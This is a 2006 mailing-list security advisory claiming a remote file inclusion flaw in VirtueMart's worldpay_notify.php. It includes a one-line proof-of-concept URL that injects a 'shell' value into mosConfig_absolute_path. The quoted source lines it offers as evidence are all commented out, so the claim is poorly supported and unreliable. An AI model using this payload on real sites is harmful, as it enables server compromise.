VirtueMart
- From: t3rr0r1st@xxxxxxxxxxxxxxxxx
- Date: 9 Sep 2006 00:41:16 -0000
#Aria-Security.net Advisory
#Discovered by: Dr.T3rr0r1st
#< www.Aria-security.net >
#Gr33t to: The-0utl4w & A.u.r.a & R@1D3N & Smok3r
#-----------------------------------------------------------
Software: VirtueMart
Link: virtumart.net
Attack method: Remote File Inclusion
Source :
//Set up the mailer to infor Warehouse of validated order
//require_once( $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php');
//$mail = new mosPHPMailer();
//$mail->PluginDir = $mosConfig_absolute_path . '/includes/phpmailer/';
//$mail->SetLanguage("en", $mosConfig_absolute_path . '/includes/phpmailer/language/');
Proof of Concept:
http://site.com/%5bpath%5d/worldpay_notify.php?mosConfig_absolute_path=shell
Solution
contact me: Advisory@xxxxxxxxxxxxxxxxx
- Prev by Date: Windows International OPcodes Database
- Next by Date: Features in a Vulnerability Management System
- Previous by thread: Windows International OPcodes Database
- Next by thread: Features in a Vulnerability Management System
- Index(es):
